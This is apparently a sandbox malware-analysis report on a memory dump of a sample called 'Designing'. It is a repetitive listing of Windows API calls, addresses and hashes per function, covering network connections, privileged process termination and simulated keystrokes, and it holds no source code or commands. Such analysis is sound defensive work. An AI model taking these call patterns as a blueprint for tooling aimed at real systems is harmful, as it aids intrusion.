                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: HandleLoadMessageModuleString_wcslen
                                                                                                                                                                              • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                                                                                                              • API String ID: 858772685-4153970271
                                                                                                                                                                              • Opcode ID: 45ecfa830e0556f15b5f40c7adc990c3315bbd0dd34b5080cfe368e1fe11d2ee
                                                                                                                                                                              • Instruction ID: d5512784f60af14334fa5153ca278a629a8e47fe2bfe249c2acf962b3ec01b1a
                                                                                                                                                                              • Opcode Fuzzy Hash: 45ecfa830e0556f15b5f40c7adc990c3315bbd0dd34b5080cfe368e1fe11d2ee
                                                                                                                                                                              • Instruction Fuzzy Hash: AE21493184431EEBCF11ABA0CC0AEEE7B79FF18304F045465B516760A2EB719658DB31
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetParent.USER32 ref: 00E029F8
                                                                                                                                                                              • GetClassNameW.USER32(00000000,?,00000100), ref: 00E02A0D
                                                                                                                                                                              • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00E02A9A
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ClassMessageNameParentSend
                                                                                                                                                                              • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                                                                                              • API String ID: 1290815626-3381328864
                                                                                                                                                                              • Opcode ID: 7cf1e2ea02df38b1b5eb1758fc69972a5869f60b562ddfbd3f25ed94c359dd65
                                                                                                                                                                              • Instruction ID: bb3982ae06cc82314ba4ff43039eacf8d178383fcec515270afcb8bdb775f1ec
                                                                                                                                                                              • Opcode Fuzzy Hash: 7cf1e2ea02df38b1b5eb1758fc69972a5869f60b562ddfbd3f25ed94c359dd65
                                                                                                                                                                              • Instruction Fuzzy Hash: 5411C676788307B9FA247621FC0FEA67BECDF15768B20101AFA05F50D1FF6568924524
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetClientRect.USER32(?,?), ref: 00DA758D
                                                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 00DA75CE
                                                                                                                                                                              • ScreenToClient.USER32(?,?), ref: 00DA75F6
                                                                                                                                                                              • GetClientRect.USER32(?,?), ref: 00DA773A
                                                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 00DA775B
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Rect$Client$Window$Screen
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1296646539-0
                                                                                                                                                                              • Opcode ID: fdb8e5737914fa54ccd4125873764aa42bb4ceb3b038e317d743d889053c3d85
                                                                                                                                                                              • Instruction ID: bdd8b11859552edaf71818b2061f6ae662568022c84b7b351302a7d5c50cef8c
                                                                                                                                                                              • Opcode Fuzzy Hash: fdb8e5737914fa54ccd4125873764aa42bb4ceb3b038e317d743d889053c3d85
                                                                                                                                                                              • Instruction Fuzzy Hash: 49C16B39A0464AEFDB10DFA9C940BEDBBF1FF18310F18841AE8A5A7250D734E951DB64
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1282221369-0
                                                                                                                                                                              • Opcode ID: 4fa1e9d8601bcda5f76a4abe40d8809183b1270e9becb0592049cc3a24c6f975
                                                                                                                                                                              • Instruction ID: c6ae9d44c35efbb1f3be13735f40cc32fda0ecfd59c9b8bb59877de7041be2fc
                                                                                                                                                                              • Opcode Fuzzy Hash: 4fa1e9d8601bcda5f76a4abe40d8809183b1270e9becb0592049cc3a24c6f975
                                                                                                                                                                              • Instruction Fuzzy Hash: 8461F771944301AFDF31AFB9D882ABE7BAADF01320F18016FE945A7385D63199448BB5
                                                                                                                                                                              APIs
                                                                                                                                                                              • SendMessageW.USER32(?,00002001,00000000,00000000), ref: 00E35C24
                                                                                                                                                                              • ShowWindow.USER32(?,00000000), ref: 00E35C65
                                                                                                                                                                              • ShowWindow.USER32(?,00000005,?,00000000), ref: 00E35C6B
                                                                                                                                                                              • SetFocus.USER32(?,?,00000005,?,00000000), ref: 00E35C6F
                                                                                                                                                                                • Part of subcall function 00E379F2: DeleteObject.GDI32(00000000), ref: 00E37A1E
                                                                                                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00E35CAB
                                                                                                                                                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00E35CB8
                                                                                                                                                                              • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00E35CEB
                                                                                                                                                                              • SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 00E35D25
                                                                                                                                                                              • SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 00E35D34
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3210457359-0
                                                                                                                                                                              • Opcode ID: 496d0f41c3ec017595c565a711a40569c38492406ca5e7ff2f227c9e6768371c
                                                                                                                                                                              • Instruction ID: cbd65b8cfce646c2ffa6458f803c1c85671268c4b47ee2c821e6b7c1b50ce3f0
                                                                                                                                                                              • Opcode Fuzzy Hash: 496d0f41c3ec017595c565a711a40569c38492406ca5e7ff2f227c9e6768371c
                                                                                                                                                                              • Instruction Fuzzy Hash: 4D51AE36640A08BFEF249B25CC4DBD9BFA1EF04758F146112FA24BA3E0C775A990DB51
                                                                                                                                                                              APIs
                                                                                                                                                                              • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00E1CBC7
                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00E1CBDA
                                                                                                                                                                              • SetEvent.KERNEL32(?), ref: 00E1CBEE
                                                                                                                                                                                • Part of subcall function 00E1CC98: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00E1CCB7
                                                                                                                                                                                • Part of subcall function 00E1CC98: GetLastError.KERNEL32 ref: 00E1CD67
                                                                                                                                                                                • Part of subcall function 00E1CC98: SetEvent.KERNEL32(?), ref: 00E1CD7B
                                                                                                                                                                                • Part of subcall function 00E1CC98: InternetCloseHandle.WININET(00000000), ref: 00E1CD86
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 337547030-0
                                                                                                                                                                              • Opcode ID: 07eb6c56a9e5d78e28f6c619effd3f880f2a5088307196554f14f118d539a769
                                                                                                                                                                              • Instruction ID: 486bdb7881ebe24db68865ab394e08d04f82c0b70668b191d5fd19c50de96371
                                                                                                                                                                              • Opcode Fuzzy Hash: 07eb6c56a9e5d78e28f6c619effd3f880f2a5088307196554f14f118d539a769
                                                                                                                                                                              • Instruction Fuzzy Hash: E8317C71144605AFCB218F61DD48AEBBBE8FF04704B20551EF85AE2610C730DC94EBA0
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00E04393: GetWindowThreadProcessId.USER32(?,00000000), ref: 00E043AD
                                                                                                                                                                                • Part of subcall function 00E04393: GetCurrentThreadId.KERNEL32 ref: 00E043B4
                                                                                                                                                                                • Part of subcall function 00E04393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00E02F00), ref: 00E043BB
                                                                                                                                                                              • MapVirtualKeyW.USER32(00000025,00000000), ref: 00E02F0A
                                                                                                                                                                              • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00E02F28
                                                                                                                                                                              • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00E02F2C
                                                                                                                                                                              • MapVirtualKeyW.USER32(00000025,00000000), ref: 00E02F36
                                                                                                                                                                              • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00E02F4E
                                                                                                                                                                              • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00E02F52
                                                                                                                                                                              • MapVirtualKeyW.USER32(00000025,00000000), ref: 00E02F5C
                                                                                                                                                                              • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00E02F70
                                                                                                                                                                              • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00E02F74
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2014098862-0
                                                                                                                                                                              • Opcode ID: 3104ac4c33c9434769422220f068e14618de7193894ff788db59ee8abae51883
                                                                                                                                                                              • Instruction ID: 3899e466dc0fa71a1e2a130685ee0287d01937078367bec21cfb7bd7d6a4d4fb
                                                                                                                                                                              • Opcode Fuzzy Hash: 3104ac4c33c9434769422220f068e14618de7193894ff788db59ee8abae51883
                                                                                                                                                                              • Instruction Fuzzy Hash: D401D8707886147FFB1067699C8EF593F99DB4DB51F101015F318BE1E0C9F254448AA9
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00E01D95,?,?,00000000), ref: 00E02159
                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,00E01D95,?,?,00000000), ref: 00E02160
                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00E01D95,?,?,00000000), ref: 00E02175
                                                                                                                                                                              • GetCurrentProcess.KERNEL32(?,00000000,?,00E01D95,?,?,00000000), ref: 00E0217D
                                                                                                                                                                              • DuplicateHandle.KERNEL32(00000000,?,00E01D95,?,?,00000000), ref: 00E02180
                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00E01D95,?,?,00000000), ref: 00E02190
                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00E01D95,00000000,?,00E01D95,?,?,00000000), ref: 00E02198
                                                                                                                                                                              • DuplicateHandle.KERNEL32(00000000,?,00E01D95,?,?,00000000), ref: 00E0219B
                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,00E021C1,00000000,00000000,00000000), ref: 00E021B5
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1957940570-0
                                                                                                                                                                              • Opcode ID: beb4abc69a7e87ad6b7bfac890ee5b752d0cd5dbab6688587453c77a79e146db
                                                                                                                                                                              • Instruction ID: a2e92c2dfd1266e5d5a25ef2da814e373949f8ee2aa8f1e84365f3d7b83adc30
                                                                                                                                                                              • Opcode Fuzzy Hash: beb4abc69a7e87ad6b7bfac890ee5b752d0cd5dbab6688587453c77a79e146db
                                                                                                                                                                              • Instruction Fuzzy Hash: BE01A8B5245308BFE610ABB6EC4DF6B7BACEB88711F014411FA05EB1A1CA719804DA20
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00DA41EA: _wcslen.LIBCMT ref: 00DA41EF
                                                                                                                                                                              • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00E0CF99
                                                                                                                                                                              • _wcslen.LIBCMT ref: 00E0CFE0
                                                                                                                                                                              • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00E0D047
                                                                                                                                                                              • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00E0D075
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ItemMenu$Info_wcslen$Default
                                                                                                                                                                              • String ID: ,*$0$<*
                                                                                                                                                                              • API String ID: 1227352736-815946194
                                                                                                                                                                              • Opcode ID: eae745a587bd844a96ec589892431afc9c1186d4030d6c27d44ebb0690a04034
                                                                                                                                                                              • Instruction ID: 4ad191ddb70267e0c39ca9d737fab188921008a4a75b6be4605e3edffe02d47c
                                                                                                                                                                              • Opcode Fuzzy Hash: eae745a587bd844a96ec589892431afc9c1186d4030d6c27d44ebb0690a04034
                                                                                                                                                                              • Instruction Fuzzy Hash: EB51C3716083029BD7149F68CC45BABBBE9EF85318F041A2DF999F31D1DBB0C9858762
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00E0DD87: CreateToolhelp32Snapshot.KERNEL32 ref: 00E0DDAC
                                                                                                                                                                                • Part of subcall function 00E0DD87: Process32FirstW.KERNEL32(00000000,?), ref: 00E0DDBA
                                                                                                                                                                                • Part of subcall function 00E0DD87: CloseHandle.KERNEL32(00000000), ref: 00E0DE87
                                                                                                                                                                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00E2ABCA
                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00E2ABDD
                                                                                                                                                                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00E2AC10
                                                                                                                                                                              • TerminateProcess.KERNEL32(00000000,00000000), ref: 00E2ACC5
                                                                                                                                                                              • GetLastError.KERNEL32(00000000), ref: 00E2ACD0
                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00E2AD21
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                                                                                                              • String ID: SeDebugPrivilege
                                                                                                                                                                              • API String ID: 2533919879-2896544425
                                                                                                                                                                              • Opcode ID: f0e6be8ccf8aa72d58977dfc6d12024a5c5d93eb3829db09f53cd4171a951fee
                                                                                                                                                                              • Instruction ID: c1c145b920c9c2ae0ad5b51b2f9eb4751bbdaf69aec1425cc25edbb0e0f4d06f
                                                                                                                                                                              • Opcode Fuzzy Hash: f0e6be8ccf8aa72d58977dfc6d12024a5c5d93eb3829db09f53cd4171a951fee
                                                                                                                                                                              • Instruction Fuzzy Hash: 8761A1742082519FD320DF15D899F25BBE1EF54318F1888ACE4665B7A3C771EC89CBA2
                                                                                                                                                                              APIs
                                                                                                                                                                              • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00E343C1
                                                                                                                                                                              • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 00E343D6
                                                                                                                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00E343F0
                                                                                                                                                                              • _wcslen.LIBCMT ref: 00E34435
                                                                                                                                                                              • SendMessageW.USER32(?,00001057,00000000,?), ref: 00E34462
                                                                                                                                                                              • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00E34490
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSend$Window_wcslen
                                                                                                                                                                              • String ID: SysListView32
                                                                                                                                                                              • API String ID: 2147712094-78025650
                                                                                                                                                                              • Opcode ID: 1bd51fbd8ccf45fba6b8e04d81a7a2ff73cbed67a999182c06ddbf907ce71e5f
                                                                                                                                                                              • Instruction ID: ec9cd6aa1042549a3756e5dc5268123dfe6a906eb8673de52c00163b6e2d08a8
                                                                                                                                                                              • Opcode Fuzzy Hash: 1bd51fbd8ccf45fba6b8e04d81a7a2ff73cbed67a999182c06ddbf907ce71e5f
                                                                                                                                                                              • Instruction Fuzzy Hash: B241A0B1A00309ABDB219F64CC49BEA7BA9EF48354F10112AF954F72D1D775A984CBA0
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00E0C6C4
                                                                                                                                                                              • IsMenu.USER32(00000000), ref: 00E0C6E4
                                                                                                                                                                              • CreatePopupMenu.USER32 ref: 00E0C71A
                                                                                                                                                                              • GetMenuItemCount.USER32(01706A50), ref: 00E0C76B
                                                                                                                                                                              • InsertMenuItemW.USER32(01706A50,?,00000001,00000030), ref: 00E0C793
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                                                                                                                              • String ID: 0$2
                                                                                                                                                                              • API String ID: 93392585-3793063076
                                                                                                                                                                              • Opcode ID: 74bce92fe108c5bf34b47ea14b24a384d8d4b0c83ef4d635b7f5b2d75f0bf1a0
                                                                                                                                                                              • Instruction ID: 756fb982d05d22dd6fd300c07f2ee5f413bb32325b7a4e431957ed1054fd341e
                                                                                                                                                                              • Opcode Fuzzy Hash: 74bce92fe108c5bf34b47ea14b24a384d8d4b0c83ef4d635b7f5b2d75f0bf1a0
                                                                                                                                                                              • Instruction Fuzzy Hash: 06516C70600205ABDF20CF78D888BAEBBF5AF54318F38525AEA11B72D1D7709985CF61
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00E38740
                                                                                                                                                                              • SetWindowLongW.USER32(00000000,000000F0,?), ref: 00E38765
                                                                                                                                                                              • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00E3877D
                                                                                                                                                                              • GetSystemMetrics.USER32(00000004), ref: 00E387A6
                                                                                                                                                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00E1C1F2,00000000), ref: 00E387C6
                                                                                                                                                                                • Part of subcall function 00DA249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00DA24B0
                                                                                                                                                                              • GetSystemMetrics.USER32(00000004), ref: 00E387B1
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
